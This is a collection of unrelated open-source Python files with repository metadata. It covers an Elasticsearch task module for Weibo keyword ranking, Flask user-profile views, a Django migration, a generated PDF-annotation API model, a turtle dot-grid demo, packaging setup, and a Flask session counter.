    keyword_list = [item for item in keyword.split(',') if item]
    body_json = {
        'submit_user': user_name,
        'keyword': json.dumps(keyword_list),
        'keyword_string': "&".join(keyword_list),
        'submit_time': ts2datetime(time_now),
        'create_time': time_now,
        'end_time': datetime2ts(end_time),
        'search_type': type,
        'status': 0,  # 0 = pending, flipped when the worker finishes
        'range': range,
        'user_ts': user_name + '-' + str(time_now),
        'pre': pre,
        'during': during,
        'start_time': datetime2ts(start_time),
        'sort_norm': sort_norm,
        'sort_scope': sort_scope,
        'time': time,
        'isall': isall,
        'number': number
    }
    es.index(index=WEIBO_RANK_KEYWORD_TASK_INDEX, doc_type=WEIBO_RANK_KEYWORD_TASK_TYPE, id=task_id, body=body_json)
    return body_json["user_ts"]
def search_weibo_task(user_name):
    """List all rank tasks submitted by `user_name`, newest first.

    Returns {'flag': True, 'data': [task_dict, ...]}.  NOTE(review): the
    query filters on 'user_rank_task.submit_user' -- confirm that field
    path against the actual mapping.
    """
    c_result = {}
    query = {"query":{"bool":{"must":[{"term":{"user_rank_task.submit_user":user_name}}]}},"size":MAX_ITEMS,"sort":[{"create_time":{"order":"desc"}}],"fields":["status","search_type","keyword","submit_user","sort_scope","sort_norm","start_time","user_ts","end_time", "create_time", 'number']}
    # `if 1:` preserved from the original (likely a leftover from a removed
    # try/except); it has no effect on control flow.
    if 1:
        return_list = []
        result = es.search(index=WEIBO_RANK_KEYWORD_TASK_INDEX , doc_type=WEIBO_RANK_KEYWORD_TASK_TYPE , body=query)['hits']
        c_result['flag'] = True
        for item in result['hits']:
            result_temp = {}
            result_temp['submit_user'] = item['fields']['submit_user'][0]
            result_temp['search_type'] = item['fields']['search_type'][0]
            result_temp['keyword'] = json.loads(item['fields']['keyword'][0])
            result_temp['sort_scope'] = item['fields']['sort_scope'][0]
            result_temp['sort_norm'] = item['fields']['sort_norm'][0]
            result_temp['start_time'] = ts2datetime(item['fields']['start_time'][0])
            result_temp['end_time'] = ts2datetime(item['fields']['end_time'][0])
            result_temp['status'] = item['fields']['status'][0]
            result_temp['create_time'] = ts2date(item['fields']['create_time'][0])
            result_temp['search_id'] = item['fields']['user_ts'][0]
            # Older documents may lack 'number'; default to 100.
            tmp = item['fields'].get('number', 0)
            if tmp:
                result_temp['number'] = int(tmp[0])
            else:
                result_temp['number'] = 100
            return_list.append(result_temp)
        c_result['data'] = return_list
        return c_result
def getResult(search_id):
    """Fetch a finished rank task document and unpack its stored fields.

    Returns a dict of task parameters plus the decoded 'result' and
    'text_results' payloads, or [] when the document lacks the expected
    fields (e.g. the task has not finished yet).
    """
    item = es.get(index=WEIBO_RANK_KEYWORD_TASK_INDEX , doc_type=WEIBO_RANK_KEYWORD_TASK_TYPE , id=search_id)
    try:
        result_obj = {}
        result_obj['keyword'] = json.loads(item['_source']['keyword'])
        result_obj['sort_scope'] = item['_source']['sort_scope']
        result_obj['sort_norm'] = item['_source']['sort_norm']
        result_obj['start_time'] = ts2datetime(item['_source']['start_time'])
        result_obj['end_time'] = ts2datetime(item['_source']['end_time'])
        result_obj['result'] = json.loads(item['_source']['result'])
        result_obj['text_results'] = json.loads(item['_source']['text_results'])
        result_obj['number'] = item['_source']['number']
        return result_obj
    except (KeyError, TypeError, ValueError):
        # Was a bare `except:`; narrowed so programming errors and
        # KeyboardInterrupt are no longer swallowed.  Missing fields or
        # malformed stored JSON still report "no result".
        return []
def delOfflineTask(search_id):
    # Hard-delete the task document.  Returns True unconditionally;
    # es.delete raises if the id does not exist.
    es.delete(index=WEIBO_RANK_KEYWORD_TASK_INDEX , doc_type=WEIBO_RANK_KEYWORD_TASK_TYPE , id = search_id )
    return True
def sort_task(user, keyword, status, start_time, end_time, submit_time):
    """Filter the user's rank tasks and return them as display rows.

    Optional filters: comma-separated `keyword`, `status` (2 means "any"),
    a `start_time`/`end_time` date window (both required together, format
    accepted by datetime2ts) and an exact `submit_time`.  Each returned row
    is [search_type, keywords, start, end, range, created, status,
    sort_norm, sort_scope, task_id].
    """
    # Base query: only tasks submitted by this user, newest first.
    query_body = {
        "query":{
            "filtered":{
                "filter":{
                    "bool":{
                        "must":[
                            {"term":{"submit_user": user}}
                        ]
                    }
                }
            }
        },
        "size": 10000,
        "sort":{"submit_time":{"order":"desc"}}
    }
    query_list = []
    if keyword:
        keyword_list = keyword.split(',')
        query_list.append({"terms":{"keyword_string":keyword_list}})
    # status == 2 is the sentinel for "do not filter on status".
    if status != 2:
        query_list.append({"term":{"status": status}})
    if start_time and end_time:
        start_ts = datetime2ts(start_time)
        end_ts = datetime2ts(end_time)
        # Both the task's start and end must fall inside the window.
        query_list.append({"range":{"start_time":{"gte":start_ts, "lte":end_ts}}})
        query_list.append({"range":{"end_time":{"gte":start_ts, "lte":end_ts}}})
    if submit_time:
        query_list.append({"term":{"submit_time": submit_time}})
    if query_list:
        query_body["query"]["filtered"]["filter"]["bool"]["must"].extend(query_list)
    #print query_body
    search_results = es.search(index=WEIBO_RANK_KEYWORD_TASK_INDEX, doc_type=WEIBO_RANK_KEYWORD_TASK_TYPE, body=query_body)["hits"]["hits"]
    results = []
    if search_results:
        for item in search_results:
            iter_item = item['_source']
            tmp = []
            tmp.append(iter_item['search_type'])
            tmp.append(json.loads(iter_item['keyword']))
            tmp.append(ts2datetime(iter_item['start_time']))
            tmp.append(ts2datetime(iter_item['end_time']))
            tmp.append(iter_item['range'])
            tmp.append(ts2date(iter_item['create_time']))
            tmp.append(iter_item['status'])
            tmp.append(iter_item['sort_norm'])
            tmp.append(iter_item['sort_scope'])
            tmp.append(item['_id']) # task_name
            results.append(tmp)
    return results
if __name__ == "__main__":
    # NOTE(review): `search_task` is not defined in this module -- the
    # nearest match is `sort_task` (same six-argument shape); confirm the
    # intended target.  The print *statement* also marks this as Python 2.
    print search_task("admin@qq.com", [], 0, '', '', '2016-04-12')
| [
"1257819385@qq.com"
] | 1257819385@qq.com |
43bf411f069beff4b058247c875c82e5f19f01bc | 4b1965b3d831ab54998973afb26f4327ed010336 | /info/user/views.py | 4edbf7fa25d4329141c2449cb244798b16174185 | [] | no_license | yc12192057/information11_mm | 7d353dfe61962eb0bd2c29b7f0b54a2a62953262 | 2e4052d130b200797aa8a57a0d37f8267d523a8b | refs/heads/master | 2020-03-21T10:22:23.558714 | 2018-06-24T02:34:25 | 2018-06-24T02:34:25 | 138,447,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,383 | py | from flask import current_app
from flask import g
from flask import request
from flask import session
from info.utils.image_storage import storage
from info import constants
from info import db
from info.models import Category, News
from info.utils.response_code import RET
from . import profile_blue
from flask import render_template,redirect,jsonify
from info.utils.common import user_login_data
from info.utils.image_storage import storage
@profile_blue.route("/news_list")
@user_login_data
def news_list():
    """Paginated list of the news posts authored by the logged-in user."""
    # Requested page number; fall back to page 1 on non-numeric input.
    page = request.args.get("p",1)
    try:
        page = int(page)
    except Exception as e:
        current_app.logger.error(e)
        page = 1
    user = g.user
    # 2 items per page; error_out=False returns an empty page past the end.
    paginate = News.query.filter(News.user_id == user.id).paginate(page,2,False)
    items = paginate.items
    current_page = paginate.page
    total_page = paginate.pages
    news_list = []
    for item in items:
        news_list.append(item.to_review_dict())
    data = {
        "current_page":current_page,
        "total_page":total_page,
        "news_list":news_list
    }
    return render_template("news/user_news_list.html",data = data)
@profile_blue.route("/news_release",methods = ["GET","POST"])
@user_login_data
def news_release():
    """GET renders the publish form; POST stores a user-submitted article."""
    if request.method == "GET":
        # Fetch the news categories and pass them to the template.
        category_list = Category.query.all()
        categorys = []
        for category in category_list:
            categorys.append(category.to_dict())
        # Drop element 0 of the list (the placeholder category).
        categorys.pop(0)
        data = {
            "categories":categorys
        }
        return render_template("news/user_news_release.html",data = data)
    # POST: read the article fields submitted via the form.
    title = request.form.get("title")
    category_id = request.form.get("category_id")
    digest = request.form.get("digest")
    index_image = request.files.get("index_image")
    content = request.form.get("content")
    if not all([title,category_id,digest,index_image,content]):
        return jsonify(errno = RET.PARAMERR,errmsg = "参数错误")
    user = g.user
    # Upload the cover image to Qiniu; `key` is the stored object name.
    index_image = index_image.read()
    key = storage(index_image)
    # Persist the newly published article.
    news = News()
    news.title = title
    news.source = "个人来源"
    news.digest = digest
    news.content = content
    news.index_image_url = constants.QINIU_DOMIN_PREFIX + key
    news.category_id = category_id
    news.user_id = user.id
    # Status 1 = awaiting review.
    news.status = 1
    db.session.add(news)
    db.session.commit()
    return jsonify(errno = RET.OK,errmsg = "发布成功")
@profile_blue.route("/collection")
@user_login_data
def collection():
    """Paginated list of the news the logged-in user has collected."""
    # Page number of the collection list; defaults to the first page.
    page = request.args.get("p",1)
    try:
        page = int(page)
    except Exception as e:
        current_app.logger.error(e)
        page = 1
    user = g.user
    # Paginate the user's collected-news relationship:
    # first argument is the page number,
    # second argument is the number of items per page.
    paginate = user.collection_news.paginate(page,10,False)
    items = paginate.items
    current_page = paginate.page
    total_page = paginate.pages
    collections = []
    for item in items:
        collections.append(item.to_dict())
    data = {
        "collections":collections,
        "current_page":current_page,
        "total_page":total_page,
    }
    return render_template("news/user_collection.html",data = data)
"""修改密码"""
@profile_blue.route("/pass_info",methods = ["GET","POST"])
@user_login_data
def pass_info():
    """GET: render the change-password page; POST: update the password.

    POST expects a JSON body with ``old_password`` and ``new_password``.
    """
    if request.method == "GET":
        return render_template("news/user_pass_info.html")
    user = g.user
    old_password = request.json.get("old_password")
    new_password = request.json.get("new_password")
    if not all([old_password,new_password]):
        return jsonify(errno = RET.PARAMERR,errmsg = "请输入密码")
    # The old password must verify before a new one may be set.
    if not user.check_password(old_password):
        return jsonify(errno = RET.PARAMERR,errmsg = "旧密码错误")
    # Old password verified: write the new one to the database.
    # (Presumably the User.password setter hashes it — confirm in the model.)
    user.password = new_password
    db.session.commit()
    return jsonify(errno = RET.OK,errmsg = "密码修改成功")
@profile_blue.route("/pic_info",methods= ["GET","POST"])
@user_login_data
def pic_info():
    """GET: show the avatar page; POST: upload and store a new avatar.

    POST expects a multipart file field named ``avatar``; the image bytes are
    uploaded via storage() and the returned key is stored on the user record.
    """
    user = g.user
    if request.method == "GET":
        data = {
            "user_info": user.to_dict() if user else None
        }
        return render_template("news/user_pic_info.html", data=data)
    # FIX: the original called .read() on request.files.get("avatar") without
    # checking it, so a POST without an "avatar" file crashed with an
    # AttributeError (HTTP 500). Validate first, matching the PARAMERR
    # pattern used by the other POST handlers in this module.
    avatar_file = request.files.get("avatar")
    if not avatar_file:
        return jsonify(errno = RET.PARAMERR,errmsg = "参数错误")
    avatar = avatar_file.read()
    # storage() uploads the bytes and returns an object key; the browsable
    # URL is the Qiniu domain prefix plus that key, e.g.
    # http://oyucyko3w.bkt.clouddn.com/<key>
    url = storage(avatar)
    user.avatar_url = url
    db.session.commit()
    return jsonify(errno = RET.OK,errmsg = "上传成功",data={"avatar_url": constants.QINIU_DOMIN_PREFIX + url})
"""修改个人信息"""
@profile_blue.route("/base_info",methods = ["GET","POST"])
@user_login_data
def base_info():
    """GET: show the profile form; POST: update nickname, signature, gender.

    POST expects a JSON body with ``nick_name``, ``signature`` and ``gender``.
    """
    user = g.user
    if request.method == "GET":
        data = {
            "user_info": user.to_dict() if user else None
        }
        return render_template("news/user_base_info.html",data = data)
    nick_name = request.json.get("nick_name")
    signature = request.json.get("signature")
    gender = request.json.get("gender")
    # FIX: validate the payload before mutating the user record, matching the
    # "if not all([...])" pattern used by the other POST handlers in this
    # file. Previously a missing field silently overwrote the profile with
    # None.
    if not all([nick_name,signature,gender]):
        return jsonify(errno = RET.PARAMERR,errmsg = "参数错误")
    user.nick_name = nick_name
    user.signature = signature
    user.gender = gender
    # Persist the changes.
    db.session.commit()
    # Keep the session's copy of the nickname in sync with the database.
    session["nick_name"] = user.nick_name
    return jsonify(errno = RET.OK,errmsg = "修改成功")
@profile_blue.route("/info")
@user_login_data
def info():
    """Render the profile landing page, or bounce anonymous visitors home."""
    user = g.user
    if not user:
        # Not logged in: redirect back to the home page.
        return redirect("/")
    data = {
        "user_info": user.to_dict() if user else None
    }
    return render_template("news/user.html",data = data) | [
"xwp_fullstack@163.com"
] | xwp_fullstack@163.com |
93d1c4b038d428ed57ee5e22dfd6aa42a7abb5be | d0168d08221da5bf95c0dd511efeecddc9b0a73d | /profiles/migrations/0001_initial.py | cdaa8070d22ad1710c0d0041619d3e087f6b3285 | [] | no_license | alexarirok/roret-farm-software | 900b5842c7b39c4a19543e138a719e4b496531a9 | aa23fd729351f0d045b2e310dc839a8b4d639c6d | refs/heads/master | 2021-04-08T21:03:59.709224 | 2020-05-01T00:07:53 | 2020-05-01T00:07:53 | 248,808,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 853 | py | # Generated by Django 3.0.5 on 2020-04-23 21:43
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations; avoid hand-editing once the
    # migration has been applied anywhere.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('firstName', models.CharField(max_length=50, null=True)),
                ('lastName', models.CharField(max_length=50)),
                ('email', models.EmailField(blank=True, max_length=254)),
                # NOTE(review): an IntegerField cannot keep leading zeros or a
                # "+" country prefix — confirm a CharField isn't needed here.
                ('phoneNumber', models.IntegerField(blank=True)),
                ('department', models.CharField(blank=True, max_length=30)),
                ('bio', models.TextField(blank=True, max_length=500)),
            ],
        ),
    ]
| [
"akorir233@gmail.com"
] | akorir233@gmail.com |
6166a19921057cbb6fd2c937922458411e917f51 | ffe147e443dbd3c4e42b923393bda72d73e2eb75 | /server.py | fa99c5174a8375ca68aa5bb3616f8b03aa750fac | [] | no_license | jwilson573/counter_assignment | cf7d4418f5f54198dcac8f2dd24e25d62702209d | b958f11f910dfed8b23b885e57c60f807fb47c77 | refs/heads/master | 2020-06-22T23:00:14.943527 | 2017-06-13T15:10:06 | 2017-06-13T15:10:06 | 94,226,343 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | from flask import Flask, session, render_template, redirect, request
app = Flask(__name__)
app.secret_key = "TestKey"  # required for Flask session support
# NOTE(review): this module-level counter is never used anywhere below; the
# per-visitor count lives in session['counter'].
counter = 0
def sessionCounter():
    """Increment the per-session page counter, starting it at 1 if absent."""
    # dict.get with a default replaces the original try/except KeyError,
    # which is the canonical idiom for "read or initialise" on a mapping.
    session['counter'] = session.get('counter', 0) + 1
@app.route('/')
def index():
    # Every visit to the root page bumps the session counter by one.
    sessionCounter()
    return render_template('index.html', counter=session['counter'])
@app.route('/plus2')
def plus2():
    # Adds 1 here, then the redirect to '/' triggers index(), which adds
    # another 1 — so one visit to /plus2 raises the counter by 2 in total.
    session['counter'] += 1
    return redirect('/')
@app.route('/reset')
def reset():
    # Zero the counter; the redirect to '/' immediately bumps it back to 1.
    session['counter'] = 0
    return redirect('/')
# Development server only; use a WSGI server in production.
app.run(debug=True) | [
"jonathon.b.wilson@gmail.com"
] | jonathon.b.wilson@gmail.com |
cb83f4850aea698f5ef2fc3ef219bd74922e880a | beb131847b4f9c3abb5bf7cc868a9c46ed460532 | /setup.py | 39be4f8b8143ba24a9c1f8c12cd7b883cd1d9dc5 | [
"MIT"
] | permissive | mfy68/MfyReport | 46755c7c32f5336ca47d58fad1562bfb2e6f7b8e | 44edd71372c72959e437e92b8fbd2ce78d0766d5 | refs/heads/master | 2023-07-15T16:06:24.845691 | 2021-08-14T03:12:43 | 2021-08-14T03:12:43 | 394,526,847 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | #-*- coding:utf8 -*- #
#-----------------------------------------------------------------------------------
# ProjectName: mfyreport
# FileName: setup
# Author: MingFeiyang
# Datetime: 2021/8/9 14:23
#-----------------------------------------------------------------------------------
from setuptools import setup, find_packages
# Use the README as the long description shown on PyPI.
with open("README.md", "r", encoding='utf8') as fh:
    long_description = fh.read()
setup(
    name='mfyreport',
    version='1.1.3',
    author='MingFeiyang',
    author_email='mfy1102@163.com',
    url='https://pypi.org/project/mfyreport',
    long_description=long_description,
    long_description_content_type="text/markdown",
    # NOTE(review): exact version pins (==) are unusual for a library and can
    # force conflicts on consumers — confirm >= bounds weren't intended.
    install_requires=["Jinja2==2.10.1", "PyYAML==5.3.1","requests==2.24.0"],
    packages=find_packages(),
    package_data={
        # Ship bundled HTML report templates and markdown files.
        "": ["*.html",'*.md'],
    },
    python_requires='>=3.6',
    classifiers=[
        "Programming Language :: Python :: 3",
    ],
) | [
"88566917+mfy68@users.noreply.github.com"
] | 88566917+mfy68@users.noreply.github.com |
6e29a6e6c458214a2a869d88d2a4615e11373078 | adf2e802c7563e4b7b7cc279a54deceb6a803098 | /openapi_client/models/pdf_annotate_parameters.py | 9dc6b17b59f3a07476f94e6f5e9c90548eeb50bf | [] | no_license | Orpalis/passportpdfsdk-python | 2466f7568becf2bd386bd9e4e00b4e3c1e642727 | 257d305ca9e6508d44fe521a1e4721f1835e8d0e | refs/heads/master | 2022-04-24T15:58:21.257112 | 2020-04-27T11:09:37 | 2020-04-27T11:09:37 | 254,665,250 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,981 | py | # coding: utf-8
"""
PassportPDF API
Another brick in the cloud # noqa: E501
The version of the OpenAPI document: 1.0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class PdfAnnotateParameters(object):
    # Auto-generated model — regenerate from the OpenAPI spec with
    # openapi-generator rather than hand-editing this file.
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    """
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Attribute name -> OpenAPI type; consumed by to_dict() serialization.
    openapi_types = {
        'file_id': 'str',
        'page_range': 'str',
        'annotation_type': 'AnnotationType',
        'sticky_note_annotation_parameters': 'StickyNoteAnnotationParameters',
        'link_annotation_parameters': 'LinkAnnotationParameters',
        'free_text_annotation_parameters': 'FreeTextAnnotationParameters',
        'line_annotation_parameters': 'LineAnnotationParameters',
        'square_and_circle_annotation_parameters': 'SquareAndCircleAnnotationParameters',
        'rubber_stamp_annotation_parameters': 'RubberStampAnnotationParameters'
    }
    # Python attribute name -> JSON key used on the wire.
    attribute_map = {
        'file_id': 'FileId',
        'page_range': 'PageRange',
        'annotation_type': 'AnnotationType',
        'sticky_note_annotation_parameters': 'StickyNoteAnnotationParameters',
        'link_annotation_parameters': 'LinkAnnotationParameters',
        'free_text_annotation_parameters': 'FreeTextAnnotationParameters',
        'line_annotation_parameters': 'LineAnnotationParameters',
        'square_and_circle_annotation_parameters': 'SquareAndCircleAnnotationParameters',
        'rubber_stamp_annotation_parameters': 'RubberStampAnnotationParameters'
    }
    def __init__(self, file_id=None, page_range=None, annotation_type=None, sticky_note_annotation_parameters=None, link_annotation_parameters=None, free_text_annotation_parameters=None, line_annotation_parameters=None, square_and_circle_annotation_parameters=None, rubber_stamp_annotation_parameters=None, local_vars_configuration=None):  # noqa: E501
        """PdfAnnotateParameters - a model defined in OpenAPI"""  # noqa: E501
        # local_vars_configuration toggles client-side validation in setters.
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration
        self._file_id = None
        self._page_range = None
        self._annotation_type = None
        self._sticky_note_annotation_parameters = None
        self._link_annotation_parameters = None
        self._free_text_annotation_parameters = None
        self._line_annotation_parameters = None
        self._square_and_circle_annotation_parameters = None
        self._rubber_stamp_annotation_parameters = None
        self.discriminator = None
        # file_id and page_range are required; their setters reject None.
        self.file_id = file_id
        self.page_range = page_range
        if annotation_type is not None:
            self.annotation_type = annotation_type
        if sticky_note_annotation_parameters is not None:
            self.sticky_note_annotation_parameters = sticky_note_annotation_parameters
        if link_annotation_parameters is not None:
            self.link_annotation_parameters = link_annotation_parameters
        if free_text_annotation_parameters is not None:
            self.free_text_annotation_parameters = free_text_annotation_parameters
        if line_annotation_parameters is not None:
            self.line_annotation_parameters = line_annotation_parameters
        if square_and_circle_annotation_parameters is not None:
            self.square_and_circle_annotation_parameters = square_and_circle_annotation_parameters
        if rubber_stamp_annotation_parameters is not None:
            self.rubber_stamp_annotation_parameters = rubber_stamp_annotation_parameters
    @property
    def file_id(self):
        """Gets the file_id of this PdfAnnotateParameters.  # noqa: E501
        The identifier of the previously uploaded file to be processed.  # noqa: E501
        :return: The file_id of this PdfAnnotateParameters.  # noqa: E501
        :rtype: str
        """
        return self._file_id
    @file_id.setter
    def file_id(self, file_id):
        """Sets the file_id of this PdfAnnotateParameters.
        The identifier of the previously uploaded file to be processed.  # noqa: E501
        :param file_id: The file_id of this PdfAnnotateParameters.  # noqa: E501
        :type: str
        """
        if self.local_vars_configuration.client_side_validation and file_id is None:  # noqa: E501
            raise ValueError("Invalid value for `file_id`, must not be `None`")  # noqa: E501
        self._file_id = file_id
    @property
    def page_range(self):
        """Gets the page_range of this PdfAnnotateParameters.  # noqa: E501
        Specifies the page or the range of page to be annotated.  # noqa: E501
        :return: The page_range of this PdfAnnotateParameters.  # noqa: E501
        :rtype: str
        """
        return self._page_range
    @page_range.setter
    def page_range(self, page_range):
        """Sets the page_range of this PdfAnnotateParameters.
        Specifies the page or the range of page to be annotated.  # noqa: E501
        :param page_range: The page_range of this PdfAnnotateParameters.  # noqa: E501
        :type: str
        """
        if self.local_vars_configuration.client_side_validation and page_range is None:  # noqa: E501
            raise ValueError("Invalid value for `page_range`, must not be `None`")  # noqa: E501
        self._page_range = page_range
    @property
    def annotation_type(self):
        """Gets the annotation_type of this PdfAnnotateParameters.  # noqa: E501
        :return: The annotation_type of this PdfAnnotateParameters.  # noqa: E501
        :rtype: AnnotationType
        """
        return self._annotation_type
    @annotation_type.setter
    def annotation_type(self, annotation_type):
        """Sets the annotation_type of this PdfAnnotateParameters.
        :param annotation_type: The annotation_type of this PdfAnnotateParameters.  # noqa: E501
        :type: AnnotationType
        """
        self._annotation_type = annotation_type
    @property
    def sticky_note_annotation_parameters(self):
        """Gets the sticky_note_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :return: The sticky_note_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :rtype: StickyNoteAnnotationParameters
        """
        return self._sticky_note_annotation_parameters
    @sticky_note_annotation_parameters.setter
    def sticky_note_annotation_parameters(self, sticky_note_annotation_parameters):
        """Sets the sticky_note_annotation_parameters of this PdfAnnotateParameters.
        :param sticky_note_annotation_parameters: The sticky_note_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :type: StickyNoteAnnotationParameters
        """
        self._sticky_note_annotation_parameters = sticky_note_annotation_parameters
    @property
    def link_annotation_parameters(self):
        """Gets the link_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :return: The link_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :rtype: LinkAnnotationParameters
        """
        return self._link_annotation_parameters
    @link_annotation_parameters.setter
    def link_annotation_parameters(self, link_annotation_parameters):
        """Sets the link_annotation_parameters of this PdfAnnotateParameters.
        :param link_annotation_parameters: The link_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :type: LinkAnnotationParameters
        """
        self._link_annotation_parameters = link_annotation_parameters
    @property
    def free_text_annotation_parameters(self):
        """Gets the free_text_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :return: The free_text_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :rtype: FreeTextAnnotationParameters
        """
        return self._free_text_annotation_parameters
    @free_text_annotation_parameters.setter
    def free_text_annotation_parameters(self, free_text_annotation_parameters):
        """Sets the free_text_annotation_parameters of this PdfAnnotateParameters.
        :param free_text_annotation_parameters: The free_text_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :type: FreeTextAnnotationParameters
        """
        self._free_text_annotation_parameters = free_text_annotation_parameters
    @property
    def line_annotation_parameters(self):
        """Gets the line_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :return: The line_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :rtype: LineAnnotationParameters
        """
        return self._line_annotation_parameters
    @line_annotation_parameters.setter
    def line_annotation_parameters(self, line_annotation_parameters):
        """Sets the line_annotation_parameters of this PdfAnnotateParameters.
        :param line_annotation_parameters: The line_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :type: LineAnnotationParameters
        """
        self._line_annotation_parameters = line_annotation_parameters
    @property
    def square_and_circle_annotation_parameters(self):
        """Gets the square_and_circle_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :return: The square_and_circle_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :rtype: SquareAndCircleAnnotationParameters
        """
        return self._square_and_circle_annotation_parameters
    @square_and_circle_annotation_parameters.setter
    def square_and_circle_annotation_parameters(self, square_and_circle_annotation_parameters):
        """Sets the square_and_circle_annotation_parameters of this PdfAnnotateParameters.
        :param square_and_circle_annotation_parameters: The square_and_circle_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :type: SquareAndCircleAnnotationParameters
        """
        self._square_and_circle_annotation_parameters = square_and_circle_annotation_parameters
    @property
    def rubber_stamp_annotation_parameters(self):
        """Gets the rubber_stamp_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :return: The rubber_stamp_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :rtype: RubberStampAnnotationParameters
        """
        return self._rubber_stamp_annotation_parameters
    @rubber_stamp_annotation_parameters.setter
    def rubber_stamp_annotation_parameters(self, rubber_stamp_annotation_parameters):
        """Sets the rubber_stamp_annotation_parameters of this PdfAnnotateParameters.
        :param rubber_stamp_annotation_parameters: The rubber_stamp_annotation_parameters of this PdfAnnotateParameters.  # noqa: E501
        :type: RubberStampAnnotationParameters
        """
        self._rubber_stamp_annotation_parameters = rubber_stamp_annotation_parameters
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively serialize nested models, lists and dicts declared in
        # openapi_types; anything exposing to_dict() is expanded in place.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, PdfAnnotateParameters):
            return False
        return self.to_dict() == other.to_dict()
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, PdfAnnotateParameters):
            return True
        return self.to_dict() != other.to_dict()
| [
"e.carrere@orpalis.com"
] | e.carrere@orpalis.com |
1fcb9a5bc116b70cacd5ddbd3646b35b3f6e0d8c | e0527bce5c53a196752d3a16adf50cb60754de5f | /05-How to Repeat Actions demos/02-dotty_dots.py | 47bb00a38d29385492c81d3cb4b98ea027472cab | [] | no_license | ARWA-ALraddadi/python-tutorial-for-beginners | ddeb657f419fbc176bea273bc9fb6b88d1894191 | 21cedfc47871ca4d25c2382464c60ab0a2121205 | refs/heads/master | 2023-06-30T20:24:30.688800 | 2021-08-08T08:22:29 | 2021-08-08T08:22:29 | 193,094,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,825 | py | #---------------------------------------------------------------------
#
# Dotty dots - Repeating actions with minor variations
#
# Up until now the only repetition we've seen has been the same action
# done many times. This simple demonstration shows how actions can
# be repeated with minor variations for each different value in a
# list.
#
# The program simply draws a grid of multi-coloured dots. Experiment
# with the code to produce different patterns!
#
# Some useful constant values, all in pixels
canvas_size = 600
max_coord = 250
grid_size = 20
dot_size = 15
# Set up a drawing canvas with a black background
from turtle import *
setup(canvas_size, canvas_size)
title("Dotty dots")
bgcolor('black')
# Set up some drawing characteristics
penup()
speed('fastest')
# Define a list of colours (25 entries -> one dot per column in every row)
column_colours = ['red', 'green', 'blue', 'yellow', 'white', 'orange',
                  'aqua', 'olive', 'misty rose', 'salmon', 'spring green',
                  'fuchsia', 'deep sky blue', 'silver', 'aquamarine',
                  'orange red', 'seashell', 'chocolate', 'light steel blue',
                  'tomato', 'chartreuse', 'bisque', 'dark orchid',
                  'powder blue', 'gainsboro']
# Determine how many rows we can fit between the maximum
# and minimum y-coords, separated by the given grid size
# (250 * 2 // 20 = 25 rows, matching the 25 colours above)
number_of_rows = max_coord * 2 // grid_size
# Do the same action multiple times, with the only
# difference being the row number
for row_number in range(number_of_rows):
    # Go to the start of the row
    goto(-max_coord, max_coord - row_number * grid_size)
    # Do the same action multiple times, with the only
    # difference being the colour
    for colour in column_colours:
        color(colour)
        dot(dot_size)
        forward(grid_size)
# Exit gracefully
hideturtle()
done()
| [
"noreply@github.com"
] | noreply@github.com |
22f3c9cd4a9a1004dd7c7bb512643d2bbf2cbdb2 | 048405bfa0b48eaf78dd2298bdfe61472bd74eef | /scripts/multiproc.py | d0bf77fe6d0ed47a785ac752a9bddf3529d5e1ed | [] | no_license | sousa-edvan/greedy_grasp_ant | 2218ae20f707baa8d5428db76129e5c758a21d07 | 12f5ac99b4d0e9599a2ecd138f8f6a3551fe2473 | refs/heads/master | 2022-01-27T02:30:35.977782 | 2019-07-19T16:39:20 | 2019-07-19T16:39:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | import os
import pandas as pd
import subprocess
